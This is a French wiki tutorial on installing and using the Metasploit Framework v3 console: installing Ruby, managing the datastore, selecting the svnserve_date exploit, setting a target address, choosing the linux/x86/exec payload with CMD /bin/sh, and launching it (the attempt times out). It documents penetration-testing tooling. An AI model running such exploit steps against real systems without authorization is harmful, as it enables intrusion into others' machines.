Openstuff Wiki : HowtoMetaploit

HomePage :: Categories :: PageIndex :: RecentChanges :: RecentlyCommented :: Login/Register
Cet article est une petite explication qui porte sur l'installation et l'utilisation du framework metaploit en version 3.

1. Installation


Installation de l'interpréteur ruby: (Ruby interpreter 1.8.4+)
apt-get install ruby libopenssl-ruby libreadline-ruby


2. Mise a jours du framework


SVN rulez:
svn update


3. Fonctionnement


Il existe plusieurs interface:
 This interface takes a module name as the first parameter, followed by the options in a VAR=VAL format, and finally an action code to specify what should be done.
 The action code is a single letter; S for summary, O for options, A for advanced options, I for IDS evasions, P for payloads, T for targets, AC for auxiliary actions, C to try a vulnerability check, and E to exploit.


3.1 L'interface console


L'interface console se lance via la commande suivante:
 ./msfconsole
 
	             _                  _       _ _
	            | |                | |     (_) |
  _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
 | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
 | | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
 |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
	                         | |
	                         |_|
 
 
	    =[ msf v3.0
 + -- --=[ 191 exploits - 106 payloads
 + -- --=[ 17 encoders - 5 nops
	    =[ 36 aux
 
 msf > 


Vous devez avoir le logo en ASCII art, la version courante, le nombre de modules ainsi que le prompt msf >. A partir d'ici vous pouvez taper help pour avoir de l'aide. A noter la completion qui est bien pratique :).

Ici nous somme dans le mode principal qui permet de lister les exploits, payloads et de configurer les options globales.


4. Le datastore


Le système de datastore permet a l'interface de stocker les options ou les paramètres. Il existe un datastore global et un pour chaque module.
Le datastore global s'utilise via la console, avec les commandes setg et unsetg. La sauvegarde du datastore se fait via la commande save (sauvegarde dans HOME/.msf3/config).

Etat courant du datastore:
 msf > setg
 
 Global
 ======
 
 No entries in data store.


Le datastore module s'utilise avec les commandes set et unset. Attention, celui-ci s'applique uniquement au module actuellement chargé. Le changement de module via la commande use fait changer automatiquement de datastore.

L'intérêt est que cela permet de définir un paramètre en datastore global et de la surcharger uniquement pour certain module.

5. Utilisation


5.1 Choix du module


Il est possible de voir l'ensemble des modules disponible via la commande show. Sinon pour avoir les modules d'un type particulier (encoder, payload, ...), il faudra utiliser show <type de module>.

Par exemple, la liste des exploits disponible :
 > show exploits


il est possible d'avoir des infos sur un exploit :
 > info linux/ids/snortbopre


Pour utiliser un module:
 msf > use multi/svn/svnserve_date
 msf exploit(svnserve_date) >


5.2 Configuration


Une fois le module sélectionné il faut le configurer.

Voir les arguments utilisable:
 msf exploit(svnserve_date) > show options
 
 Module options:
 
	Name   Current Setting       Required  Description                    
	----   ---------------       --------  -----------                    
	RHOST                        yes       The target address             
	RPORT  3690                  yes       The target port                
	URL    svn://host/svn/repos  yes       SVN URL (ie svn://host/repos)  


Configuration de la target:
 msf exploit(svnserve_date) > set RHOST 10.234.68.126
 RHOST => 10.234.68.126


Vérification que toutes les options sont configurées et si la cible est vulnérable à l'exploitation (tous les modules ne l'implémente pas)
 msf exploit(svnserve_date) > check
 [-] Check failed: The state could not be determined.


Choix de la target:
 msf exploit(svnserve_date) > show targets
 
 Exploit targets:
 
	Id  Name                
	--  ----                
	0   Linux Bruteforce    
	1   FreeBSD Bruteforce  

 msf exploit(svnserve_date) > set TARGET 0
 TARGET => 0


5.3 Sélection du payload


Le payload est le code qui sera lancé sur la target une fois un exploit réussi.

Liste de tous les payloads compatible avec l'exploit courant:
 msf exploit(svnserve_date) > show payloads
 [...]
 msf exploit(svnserve_date) > set PAYLOAD linux/x86/exec
 PAYLOAD => linux/x86/exec


Configuration des options associées
 msf exploit(svnserve_date) > show options
 [...]
 Payload options:
 
   Name  Current Setting  Required  Description                    
   ----  ---------------  --------  -----------                    
   CMD                    yes       The command string to execute 
 
 msf exploit(svnserve_date) > set CMD /bin/sh
 CMD => /bin/sh


5.4 Lancement de l'exploit

 msf exploit(svnserve_date) > exploit
 [-] Exploit failed: The connection timed out (10.234.68.126:3690).


Snif :(
Valid XHTML 1.0 Transitional :: Valid CSS :: Powered by WikkaWiki
Page was generated in 0.0869 seconds